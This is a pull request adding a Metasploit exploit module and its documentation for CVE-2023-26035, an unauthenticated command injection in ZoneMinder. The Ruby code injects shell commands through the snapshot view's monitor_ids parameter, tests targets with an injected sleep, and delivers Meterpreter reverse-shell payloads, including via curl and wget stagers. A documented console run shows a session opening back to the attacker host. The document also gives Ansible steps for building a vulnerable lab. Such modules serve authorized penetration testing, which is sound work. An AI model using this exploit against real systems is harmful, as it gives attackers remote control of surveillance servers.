### PR TITLE
Zoneminder snapshot

### DIFF
--- a/documentation/modules/exploit/unix/webapp/zoneminder_snapshots.md
+++ b/documentation/modules/exploit/unix/webapp/zoneminder_snapshots.md
@@ -4,7 +4,7 @@ This module exploits a command injection that leads to a remote execution in Zon
 
 More about the vulnerability detail: [2023-26035](https://cve.mitre.org/cgi-bin/cvename.cgi?name=2023-26035).
 
-The module will automatically use `cmd/unix/python/meterpreter/reverse_tcp` payload.
+The module will automatically use `cmd/linux/http/x64/meterpreter/reverse_tcp` payload.
 
 The module will check if the target is vulnerable, by sending a sleep command.
 
@@ -50,21 +50,18 @@ In this scenario the zoneminder-server has the IP address 192.42.0.254. The IP a
 The following demo shows how to use the exploit with minimal settings:
 
 ```
-msf6 exploit(unix/webapp/zoneminder_snapshots) > set RHOSTS 192.42.0.254
-RHOSTS => 192.42.0.254
-msf6 exploit(unix/webapp/zoneminder_snapshots) > set LHOST 192.42.1.188
-LHOST => 192.42.1.188
 msf6 exploit(unix/webapp/zoneminder_snapshots) > run
 
 [*] Started reverse TCP handler on 192.42.1.188:4444
 [*] Running automatic check ("set AutoCheck false" to disable)
+[*] Elapsed time: 10.249642733018845 seconds.
 [+] The target appears to be vulnerable.
 [*] Fetching CSRF Token
-[+] Got Token
-[*] Executing Unix Command for cmd/unix/python/meterpreter/reverse_tcp
+[+] Got Token: key:b5da21a154bc5f46cd2b3648fe9e44931dd74bac,1697109606
+[*] Executing nix Command for cmd/linux/http/x64/meterpreter/reverse_tcp
 [*] Sending payload
-[*] Sending stage (24772 bytes) to 192.42.0.254
-[*] Meterpreter session 1 opened (192.42.1.188:4444 -> 192.42.0.254:44934) at 2023-10-06 16:55:49 +0000
+[*] Sending stage (3045380 bytes) to 192.42.0.254
+[*] Meterpreter session 1 opened (192.42.1.188:4444 -> 192.42.0.254:56398) at 2023-10-12 11:20:07 +0000
 [+] Payload sent
 
 meterpreter >

--- a/documentation/modules/exploit/unix/webapp/zoneminder_snapshots.md
+++ b/documentation/modules/exploit/unix/webapp/zoneminder_snapshots.md
@@ -24,6 +24,92 @@ This module has been tested successfully on Zoneminder versions:
 
 **The 3rd party debian-repository has packages for the vulnerable versions(for example zoneminder=1.36.31-bullseye1)**
 
+### Ansible Installation
+
+This exploit was tested using [a debian bullseye cloudimage](https://cloud.debian.org/images/cloud/bullseye/20210814-734/)
+with the following ansible-roles:
+
+```yaml
+roles:
+  - src: https://github.com/ait-cs-IaaS/atb-ansible-zoneminder.git
+    version: v1.2
+    name: zoneminder
+  - src: https://github.com/ait-cs-IaaS/atb-ansible-debiansnapshot.git
+    version: v1.2
+    name: debiansnapshot
+  - src: https://github.com/ait-cs-IaaS/ansible-mariadb.git
+    version: v1.0.0
+    name: mariadb
+  - src: https://github.com/ait-cs-IaaS/ansible-apache2.git
+    version: v1.3
+    name: apache2
+```
+
+Zoneminder was deployed using the following playbook:
+
+```yaml
+- name: Install old Debian-Archive-Repo Host
+  hosts: all
+  remote_user: debian
+  become: true
+  vars:
+    debsnap_timestamp: 20210815T082041Z
+    debsnap_debrelease: bullseye
+  roles:
+    - role: debiansnapshot
+
+- name: Install Videoserver Host
+  hosts: all
+  remote_user: debian
+  become: true
+  tasks:
+    - name: Install Videoserver Packages
+      ansible.builtin.apt:
+          pkg:
+            - vim
+            - curl
+            - netcat-traditional
+          update_cache: yes
+
+  roles:
+          - role: mariadb
+          - role: apache2
+            vars:
+              apache2_modules:
+                - name: "headers"
+                - name: "rewrite"
+                - name: "expires"
+                - name: "cgi"
+              apache2_vhosts:
+                - name: default
+                  http: true
+                  vhost_template: "redir.j2"
+          - role: zoneminder
+            vars:
+              zoneminder_debrelease: bullseye
+```
+
+The following template-file("redir.j2") for apache2 redirects requests to the
+zoneminder subdirectory:
+
+```
+<VirtualHost *:80>
+	ServerName {{ item.name }}
+{% if item.aliases is defined %}
+	ServerAlias {{ item.aliases|join(' ') }}
+{% endif %}
+	DocumentRoot {{ apache2_vhost_dir }}/{{ item.name }}
+        RedirectMatch ^/$ /zm/
+	ErrorLog {{ apache2_vhost_dir }}/{{ item.name }}/log/error.log
+	CustomLog {{ apache2_vhost_dir }}/{{ item.name }}/log/access.log combined
+
+	<Directory "{{ apache2_vhost_dir }}/{{ item.name }}">
+		Options FollowSymLinks MultiViews
+		AllowOverride All
+		Require all granted
+	</Directory>
+</VirtualHost>
+```
 
 ## Verification Steps
 Example steps in this format (is also in the PR):

--- a/documentation/modules/exploit/unix/webapp/zoneminder_snapshots.md
+++ b/documentation/modules/exploit/unix/webapp/zoneminder_snapshots.md
@@ -1,0 +1,71 @@
+## Description
+
+This module exploits a command injection that leads to a remote execution in ZoneMinder surveillance software versions before 1.36.33 and before 1.37.33
+
+More about the vulnerability detail: [2023-26035](https://cve.mitre.org/cgi-bin/cvename.cgi?name=2023-26035).
+
+The module will automatically use `cmd/unix/python/meterpreter/reverse_tcp` payload.
+
+The module will check if the target is vulnerable, by sending a sleep command.
+
+
+## Vulnerable Application
+
+[Zoneminder](https://zoneminder.com/) is a free and open-source software defined telecommunications stack for real-time communication, WebRTC, telecommunications, video, and Voice over Internet Protocol.
+
+This module has been tested successfully on Zoneminder versions:
+
+* 1.36.31~64bit on Debian 11
+
+### Source and Installers
+
+* [Source Code Repository](https://github.com/ZoneMinder/zoneminder/tree/1.36.31)
+* [Installers](https://zoneminder.readthedocs.io/en/stable/installationguide/index.html)
+
+**The 3rd party debian-repository has packages for the vulnerable versions(for example zoneminder=1.36.31-bullseye1)**
+
+
+## Verification Steps
+Example steps in this format (is also in the PR):
+
+1. Do: `use exploit/unix/webapp/zoneminder_snapshots`
+2. Do: `set RHOSTS [ips]`
+3. Do: `set LHOST [lhost]`
+4. Do: `run`
+5. You should get a shell.
+
+## Options
+
+### TARGETURI
+
+Remote web path to the zoneminder installation (default: /zm/)
+
+## Scenarios
+
+In this scenario the zoneminder-server has the IP address 192.42.0.254. The IP address of the metasploit host is
+192.42.1.188.
+
+### Zoneminder 1.36.31-bullseye1
+
+The following demo shows how to use the exploit with minimal settings:
+
+```
+msf6 exploit(unix/webapp/zoneminder_snapshots) > set RHOSTS 192.42.0.254
+RHOSTS => 192.42.0.254
+msf6 exploit(unix/webapp/zoneminder_snapshots) > set LHOST 192.42.1.188
+LHOST => 192.42.1.188
+msf6 exploit(unix/webapp/zoneminder_snapshots) > run
+
+[*] Started reverse TCP handler on 192.42.1.188:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
+[*] Fetching CSRF Token
+[+] Got Token
+[*] Executing Unix Command for cmd/unix/python/meterpreter/reverse_tcp
+[*] Sending payload
+[*] Sending stage (24772 bytes) to 192.42.0.254
+[*] Meterpreter session 1 opened (192.42.1.188:4444 -> 192.42.0.254:44934) at 2023-10-06 16:55:49 +0000
+[+] Payload sent
+
+meterpreter >
+```

--- a/modules/exploits/unix/webapp/zoneminder_snapshots.rb
+++ b/modules/exploits/unix/webapp/zoneminder_snapshots.rb
@@ -1,0 +1,169 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+#
+# Copy it to: .msf4/modules/exploits/unix/webapp/zoneminder_snapshots.rb
+#
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Exploit::Remote::AutoCheck
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'ZoneMinder Snapshots Command Injection',
+        'Description' => %q{
+          This module exploits an unauthenticated command injection
+          in zoneminder that can be exploited by appending a command
+          to the "create monitor ids[]"-action of the snapshot view.
+          Affected versions: < 1.36.33, < 1.37.33
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'UnblvR',    # Discovery
+          'whotwagner' # Metasploit Module
+        ],
+        'References' => [
+          [ 'CVE', '2023-26035' ],
+          [ 'URL', 'https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-72rg-h4vf-29gr']
+        ],
+        'Privileged' => false,
+        'Platform' => 'linux',
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Linux (Dropper)',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X64],
+              'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' },
+              'Type' => :linux_dropper
+            }
+          ],
+        ],
+        'Payload' => { 'BadChars' => "\x00" },
+        'CmdStagerFlavor' => [ 'printf' ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2023-02-24',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'The ZoneMinder path', '/zm/'])
+    ])
+  end
+
+  def check
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, '/index.php'),
+      'method' => 'GET'
+    )
+    return Exploit::CheckCode::Unknown('No response from the web service') if res.nil?
+    return Exploit::CheckCode::Safe("Check TARGETURI - unexpected HTTP response code: #{res.code}") if res.code != 200
+
+    if res.body =~ /ZoneMinder/
+      csrf_magic = get_csrf_magic(res)
+      # This check executes a sleep-command and checks the response-time
+      sleep_time = 5
+      data = "view=snapshot&action=create&monitor_ids[0][Id]=0;sleep #{sleep_time}"
+      data += "&__csrf_magic=#{csrf_magic}" if csrf_magic
+      start = Time.now
+      send_request_cgi(
+        'uri' => normalize_uri(target_uri.path, '/index.php'),
+        'method' => 'POST',
+        'data' => data.to_s,
+        'keep_cookies' => true
+      )
+      finish = Time.now
+      diff = finish - start
+      if diff > sleep_time
+        return Exploit::CheckCode::Appears
+      else
+        print_good(diff.to_s)
+      end
+    else
+      return Exploit::CheckCode::Safe('Target is not a ZoneMinder web server')
+    end
+
+    Exploit::CheckCode::Safe('Target is not vulnerable')
+  rescue ::Rex::ConnectionError
+    return Exploit::CheckCode::Unknown('Could not connect to the web service')
+  end
+
+  def execute_command(cmd, _opts = {})
+    command = Rex::Text.uri_encode(cmd)
+    print_status('Sending payload')
+    data = "view=snapshot&action=create&monitor_ids[0][Id]=;#{command}"
+    data += "&__csrf_magic=#{@csrf_magic}" if @csrf_magic
+    send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, '/index.php'),
+      'method' => 'POST',
+      'data' => data.to_s,
+      'keep_cookies' => true,
+      'encode_params' => true
+    )
+    print_good('Payload sent')
+  rescue ::Rex::ConnectionError
+    fail_with(Failure::Unreachable, "#{peer} - Connection failed")
+  end
+
+  def exploit
+    # get magic csrf-token
+    print_status('Fetching CSRF Token')
+    begin
+      res = send_request_cgi(
+        'uri' => normalize_uri(target_uri.path, '/index.php'),
+        'method' => 'GET'
+      )
+      if res && res.code == 200
+        # parse token
+        @csrf_magic = get_csrf_magic(res)
+        unless @csrf_magic =~ /^key:[a-f0-9]{40},\d+/
+          fail_with(Failure::UnexpectedReply, 'Unable to parse token.')
+        end
+      else
+        fail_with(Failure::UnexpectedReply, 'Unable to fetch token.')
+      end
+      print_good('Got Token')
+      # send payload
+      print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+      case target['Type']
+      when :unix_cmd
+        execute_command(payload.encoded)
+      when :linux_dropper
+        execute_cmdstager
+      end
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Connection failed")
+    end
+  end
+
+  private
+
+  def get_csrf_magic(res)
+    return if res.nil?
+
+    res.get_html_document.at('//input[@name="__csrf_magic"]/@value')&.text
+  end
+end

--- a/modules/exploits/unix/webapp/zoneminder_snapshots.rb
+++ b/modules/exploits/unix/webapp/zoneminder_snapshots.rb
@@ -56,7 +56,7 @@ class MetasploitModule < Msf::Exploit::Remote
             }
           ],
         ],
-        'CmdStagerFlavor' => [ 'printf' ],
+        'CmdStagerFlavor' => [ 'bourne', 'curl', 'wget', 'printf', 'echo' ],
         'DefaultTarget' => 0,
         'DisclosureDate' => '2023-02-24',
         'Notes' => {

--- a/modules/exploits/unix/webapp/zoneminder_snapshots.rb
+++ b/modules/exploits/unix/webapp/zoneminder_snapshots.rb
@@ -35,13 +35,14 @@ class MetasploitModule < Msf::Exploit::Remote
         'Platform' => 'linux',
         'Targets' => [
           [
-            'Unix Command',
+            'nix Command',
             {
-              'Platform' => 'unix',
+              'Platform' => ['unix','linux'],
               'Arch' => ARCH_CMD,
               'Type' => :unix_cmd,
               'DefaultOptions' => {
-                'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp'
+                'PAYLOAD' => 'cmd/linux/http/x64/meterpreter/reverse_tcp',
+                'FETCH_WRITABLE_DIR' => '/tmp'
               }
             }
           ],

--- a/modules/exploits/unix/webapp/zoneminder_snapshots.rb
+++ b/modules/exploits/unix/webapp/zoneminder_snapshots.rb
@@ -99,7 +99,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
     return Exploit::CheckCode::Unknown('Could not connect to the web service') unless res
     print_status("Elapsed time: #{elapsed_time} seconds.")
-    if res && sleep_time < elapsed_time
+    if sleep_time < elapsed_time
       return Exploit::CheckCode::Vulnerable
     end
 

--- a/modules/exploits/unix/webapp/zoneminder_snapshots.rb
+++ b/modules/exploits/unix/webapp/zoneminder_snapshots.rb
@@ -2,8 +2,6 @@
 # This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 #
-# Copy it to: .msf4/modules/exploits/unix/webapp/zoneminder_snapshots.rb
-#
 ##
 
 class MetasploitModule < Msf::Exploit::Remote
@@ -57,7 +55,6 @@ class MetasploitModule < Msf::Exploit::Remote
             }
           ],
         ],
-        'Payload' => { 'BadChars' => "\x00" },
         'CmdStagerFlavor' => [ 'printf' ],
         'DefaultTarget' => 0,
         'DisclosureDate' => '2023-02-24',
@@ -76,34 +73,30 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def check
     res = send_request_cgi(
-      'uri' => normalize_uri(target_uri.path, '/index.php'),
+      'uri' => normalize_uri(target_uri.path, 'index.php'),
       'method' => 'GET'
     )
     return Exploit::CheckCode::Unknown('No response from the web service') if res.nil?
     return Exploit::CheckCode::Safe("Check TARGETURI - unexpected HTTP response code: #{res.code}") if res.code != 200
 
-    if res.body =~ /ZoneMinder/
-      csrf_magic = get_csrf_magic(res)
-      # This check executes a sleep-command and checks the response-time
-      sleep_time = 5
-      data = "view=snapshot&action=create&monitor_ids[0][Id]=0;sleep #{sleep_time}"
-      data += "&__csrf_magic=#{csrf_magic}" if csrf_magic
-      start = Time.now
-      send_request_cgi(
-        'uri' => normalize_uri(target_uri.path, '/index.php'),
-        'method' => 'POST',
-        'data' => data.to_s,
-        'keep_cookies' => true
-      )
-      finish = Time.now
-      diff = finish - start
-      if diff > sleep_time
-        return Exploit::CheckCode::Appears
-      else
-        print_good(diff.to_s)
-      end
-    else
+    if res.body !~ /ZoneMinder/
       return Exploit::CheckCode::Safe('Target is not a ZoneMinder web server')
+    end
+
+    csrf_magic = get_csrf_magic(res)
+    # This check executes a sleep-command and checks the response-time
+    sleep_time = 5
+    data = "view=snapshot&action=create&monitor_ids[0][Id]=0;sleep #{sleep_time}"
+    data += "&__csrf_magic=#{csrf_magic}" if csrf_magic
+    start = Time.now
+    send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'index.php'),
+      'method' => 'POST',
+      'data' => data.to_s,
+      'keep_cookies' => true
+    )
+    if sleep_time < Time.now - start
+      return Exploit::CheckCode::Appears
     end
 
     Exploit::CheckCode::Safe('Target is not vulnerable')
@@ -117,11 +110,9 @@ class MetasploitModule < Msf::Exploit::Remote
     data = "view=snapshot&action=create&monitor_ids[0][Id]=;#{command}"
     data += "&__csrf_magic=#{@csrf_magic}" if @csrf_magic
     send_request_cgi(
-      'uri' => normalize_uri(target_uri.path, '/index.php'),
+      'uri' => normalize_uri(target_uri.path, 'index.php'),
       'method' => 'POST',
-      'data' => data.to_s,
-      'keep_cookies' => true,
-      'encode_params' => true
+      'data' => data.to_s
     )
     print_good('Payload sent')
   rescue ::Rex::ConnectionError
@@ -133,29 +124,27 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status('Fetching CSRF Token')
     begin
       res = send_request_cgi(
-        'uri' => normalize_uri(target_uri.path, '/index.php'),
+        'uri' => normalize_uri(target_uri.path, 'index.php'),
         'method' => 'GET'
       )
-      if res && res.code == 200
-        # parse token
-        @csrf_magic = get_csrf_magic(res)
-        unless @csrf_magic =~ /^key:[a-f0-9]{40},\d+/
-          fail_with(Failure::UnexpectedReply, 'Unable to parse token.')
-        end
-      else
-        fail_with(Failure::UnexpectedReply, 'Unable to fetch token.')
-      end
-      print_good('Got Token')
-      # send payload
-      print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
-      case target['Type']
-      when :unix_cmd
-        execute_command(payload.encoded)
-      when :linux_dropper
-        execute_cmdstager
-      end
     rescue ::Rex::ConnectionError
       fail_with(Failure::Unreachable, "#{peer} - Connection failed")
+    end
+
+    if res && res.code == 200
+      # parse token
+      @csrf_magic = get_csrf_magic(res)
+    else
+      fail_with(Failure::UnexpectedReply, 'Unable to fetch token.')
+    end
+    print_good("Got Token: #{@csrf_magic}")
+    # send payload
+    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+    case target['Type']
+    when :unix_cmd
+      execute_command(payload.encoded)
+    when :linux_dropper
+      execute_cmdstager
     end
   end
 
@@ -164,6 +153,10 @@ class MetasploitModule < Msf::Exploit::Remote
   def get_csrf_magic(res)
     return if res.nil?
 
-    res.get_html_document.at('//input[@name="__csrf_magic"]/@value')&.text
+    token = res.get_html_document.at('//input[@name="__csrf_magic"]/@value')&.text
+    unless token =~ /^key:[a-f0-9]{40},\d+/
+      fail_with(Failure::UnexpectedReply, 'Unable to parse token.')
+    end
+    token
   end
 end

--- a/modules/exploits/unix/webapp/zoneminder_snapshots.rb
+++ b/modules/exploits/unix/webapp/zoneminder_snapshots.rb
@@ -37,7 +37,7 @@ class MetasploitModule < Msf::Exploit::Remote
           [
             'nix Command',
             {
-              'Platform' => ['unix','linux'],
+              'Platform' => ['unix', 'linux'],
               'Arch' => ARCH_CMD,
               'Type' => :unix_cmd,
               'DefaultOptions' => {
@@ -89,14 +89,16 @@ class MetasploitModule < Msf::Exploit::Remote
     sleep_time = 5
     data = "view=snapshot&action=create&monitor_ids[0][Id]=0;sleep #{sleep_time}"
     data += "&__csrf_magic=#{csrf_magic}" if csrf_magic
-    start = Time.now
-    send_request_cgi(
-      'uri' => normalize_uri(target_uri.path, 'index.php'),
-      'method' => 'POST',
-      'data' => data.to_s,
-      'keep_cookies' => true
-    )
-    if sleep_time < Time.now - start
+    res, elapsed_time = Rex::Stopwatch.elapsed_time do
+      send_request_cgi(
+        'uri' => normalize_uri(target_uri.path, 'index.php'),
+        'method' => 'POST',
+        'data' => data.to_s,
+        'keep_cookies' => true
+      )
+    end
+    print_status("Elapsed time: #{elapsed_time} seconds.")
+    if res && sleep_time < elapsed_time
       return Exploit::CheckCode::Appears
     end
 

--- a/modules/exploits/unix/webapp/zoneminder_snapshots.rb
+++ b/modules/exploits/unix/webapp/zoneminder_snapshots.rb
@@ -125,14 +125,10 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     # get magic csrf-token
     print_status('Fetching CSRF Token')
-    begin
-      res = send_request_cgi(
-        'uri' => normalize_uri(target_uri.path, 'index.php'),
-        'method' => 'GET'
-      )
-    rescue ::Rex::ConnectionError
-      fail_with(Failure::Unreachable, "#{peer} - Connection failed")
-    end
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'index.php'),
+      'method' => 'GET'
+    )
 
     if res && res.code == 200
       # parse token

--- a/modules/exploits/unix/webapp/zoneminder_snapshots.rb
+++ b/modules/exploits/unix/webapp/zoneminder_snapshots.rb
@@ -32,7 +32,7 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'URL', 'https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-72rg-h4vf-29gr']
         ],
         'Privileged' => false,
-        'Platform' => 'linux',
+        'Platform' => ['linux', 'unix'],
         'Targets' => [
           [
             'nix Command',
@@ -80,13 +80,13 @@ class MetasploitModule < Msf::Exploit::Remote
     return Exploit::CheckCode::Unknown('No response from the web service') if res.nil?
     return Exploit::CheckCode::Safe("Check TARGETURI - unexpected HTTP response code: #{res.code}") if res.code != 200
 
-    if res.body !~ /ZoneMinder/
+    unless res.body.include?('ZoneMinder')
       return Exploit::CheckCode::Safe('Target is not a ZoneMinder web server')
     end
 
     csrf_magic = get_csrf_magic(res)
     # This check executes a sleep-command and checks the response-time
-    sleep_time = 5
+    sleep_time = rand(5..10)
     data = "view=snapshot&action=create&monitor_ids[0][Id]=0;sleep #{sleep_time}"
     data += "&__csrf_magic=#{csrf_magic}" if csrf_magic
     res, elapsed_time = Rex::Stopwatch.elapsed_time do
@@ -99,7 +99,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
     print_status("Elapsed time: #{elapsed_time} seconds.")
     if res && sleep_time < elapsed_time
-      return Exploit::CheckCode::Appears
+      return Exploit::CheckCode::Vulnerable
     end
 
     Exploit::CheckCode::Safe('Target is not vulnerable')

--- a/modules/exploits/unix/webapp/zoneminder_snapshots.rb
+++ b/modules/exploits/unix/webapp/zoneminder_snapshots.rb
@@ -103,8 +103,6 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     Exploit::CheckCode::Safe('Target is not vulnerable')
-  rescue ::Rex::ConnectionError
-    return Exploit::CheckCode::Unknown('Could not connect to the web service')
   end
 
   def execute_command(cmd, _opts = {})

--- a/modules/exploits/unix/webapp/zoneminder_snapshots.rb
+++ b/modules/exploits/unix/webapp/zoneminder_snapshots.rb
@@ -137,6 +137,9 @@ class MetasploitModule < Msf::Exploit::Remote
     if res && res.code == 200
       # parse token
       @csrf_magic = get_csrf_magic(res)
+      unless @csrf_magic =~ /^key:[a-f0-9]{40},\d+/
+        fail_with(Failure::UnexpectedReply, 'Unable to parse token.')
+      end
     else
       fail_with(Failure::UnexpectedReply, 'Unable to fetch token.')
     end
@@ -156,10 +159,6 @@ class MetasploitModule < Msf::Exploit::Remote
   def get_csrf_magic(res)
     return if res.nil?
 
-    token = res.get_html_document.at('//input[@name="__csrf_magic"]/@value')&.text
-    unless token =~ /^key:[a-f0-9]{40},\d+/
-      fail_with(Failure::UnexpectedReply, 'Unable to parse token.')
-    end
-    token
+    res.get_html_document.at('//input[@name="__csrf_magic"]/@value')&.text
   end
 end

--- a/modules/exploits/unix/webapp/zoneminder_snapshots.rb
+++ b/modules/exploits/unix/webapp/zoneminder_snapshots.rb
@@ -117,8 +117,6 @@ class MetasploitModule < Msf::Exploit::Remote
       'data' => data.to_s
     )
     print_good('Payload sent')
-  rescue ::Rex::ConnectionError
-    fail_with(Failure::Unreachable, "#{peer} - Connection failed")
   end
 
   def exploit

--- a/modules/exploits/unix/webapp/zoneminder_snapshots.rb
+++ b/modules/exploits/unix/webapp/zoneminder_snapshots.rb
@@ -98,6 +98,7 @@ class MetasploitModule < Msf::Exploit::Remote
       )
     end
     return Exploit::CheckCode::Unknown('Could not connect to the web service') unless res
+
     print_status("Elapsed time: #{elapsed_time} seconds.")
     if sleep_time < elapsed_time
       return Exploit::CheckCode::Vulnerable

--- a/modules/exploits/unix/webapp/zoneminder_snapshots.rb
+++ b/modules/exploits/unix/webapp/zoneminder_snapshots.rb
@@ -97,6 +97,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'keep_cookies' => true
       )
     end
+    return Exploit::CheckCode::Unknown('Could not connect to the web service') unless res
     print_status("Elapsed time: #{elapsed_time} seconds.")
     if res && sleep_time < elapsed_time
       return Exploit::CheckCode::Vulnerable


### PR DESCRIPTION
This PR adds an exploit module for an unauthenticated remote code execution vulnerability in Zoneminder(CVE-2023-26035).

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] `use exploit/unix/webapp/zoneminder_snapshots`
- [x] ...
- [x] **Verify** the thing does what it should
- [x] **Verify** the thing does not do what it should not
- [x] **Document** the thing and how it works ([Example](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/multi/gather/aws_keys.md))

It is possible to install zoneminder using a 3rd-party debian repository: https://zoneminder.readthedocs.io/en/stable/installationguide/debian.html#easy-way-debian-11-bullseye
The repository also allows to install old versions of zoneminder in Debian Bullseye: `apt install zoneminder=1.36.31-bullseye1`
